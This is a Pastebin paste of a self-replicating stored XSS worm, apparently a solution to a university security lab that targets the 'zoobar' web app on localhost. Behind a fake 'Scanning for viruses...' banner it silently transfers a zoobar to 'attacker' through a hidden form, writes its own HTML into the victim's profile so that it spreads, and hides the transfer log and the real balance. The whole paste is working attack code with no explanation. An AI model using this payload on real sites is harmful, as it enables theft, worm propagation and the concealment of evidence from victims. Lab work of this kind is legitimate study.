Advertisement
Guest User

Untitled

a guest
Apr 25th, 2018
55
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <div id="notworm">
  2.     <b>Scanning for viruses...</b>
  3.     <div style="visibility:hidden;height:0;width:0;margin:0">
  4.         <!-- Zoobar Theft -->
  5.         <form
  6.             method="POST"
  7.             name="theftform"
  8.             target="noredirecttheft"
  9.             action="http://localhost:8080/zoobar/index.cgi/transfer"
  10.             style="display:none">
  11.         <p>Send <input name="zoobars" type="hidden" value=1 size=5 style="display:none"> zoobars</p>
  12.         <p>to <input name="recipient" type="hidden" value="attacker" size=10 style="display:none"></p>
  13.         <input type="submit" name="submission" value="Send" style="display:none">
  14.         </form>
  15.  
  16.         <!-- Profile Infection -->
  17.         <form
  18.             method="POST"
  19.             name="infectionform"
  20.             target="noredirectinfect"
  21.             action="http://localhost:8080/zoobar/index.cgi/"
  22.             style="display:none">
  23.             <textarea name="profile_update" rows="20" cols="80" style="display:none"></textarea>
  24.             <br>
  25.             <input type="submit" name="profile_submit" value="Save" style="display:none">
  26.         </form>
  27.  
  28.         <iframe name="noredirecttheft" style="display:none"></iframe>
  29.         <iframe name="noredirectinfect" style="display:none"></iframe>
  30.         <script type="text/javascript">
  31.             var steal_zoobar = function() {
  32.                 document.forms.theftform.submit();
  33.             }
  34.  
  35.             var infect_user = function() {
  36.                 profiletext = document.getElementsByName('profile_update')[0];
  37.                 profiletext.value = document.getElementById('notworm').outerHTML;
  38.                 document.forms.infectionform.submit();
  39.             }
  40.  
  41.             var hide_tracks = function() {
  42.                 // Set zoobars to 10 by overriding the 'total' global.
  43.                 document.getElementById('zoobars').className = '10';
  44.                 total = eval(document.getElementById('zoobars').className);
  45.                 showZoobars(0);
  46.                 // Hide the log.
  47.                 document.getElementsByClassName('log')[0].tBodies[0].style.display = 'none';
  48.             }
  49.  
  50.             document.addEventListener('DOMContentLoaded', function(event) {
  51.                 steal_zoobar();
  52.                 infect_user();
  53.                 hide_tracks();
  54.             })
  55.         </script>
  56.     </div>
  57. </div>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement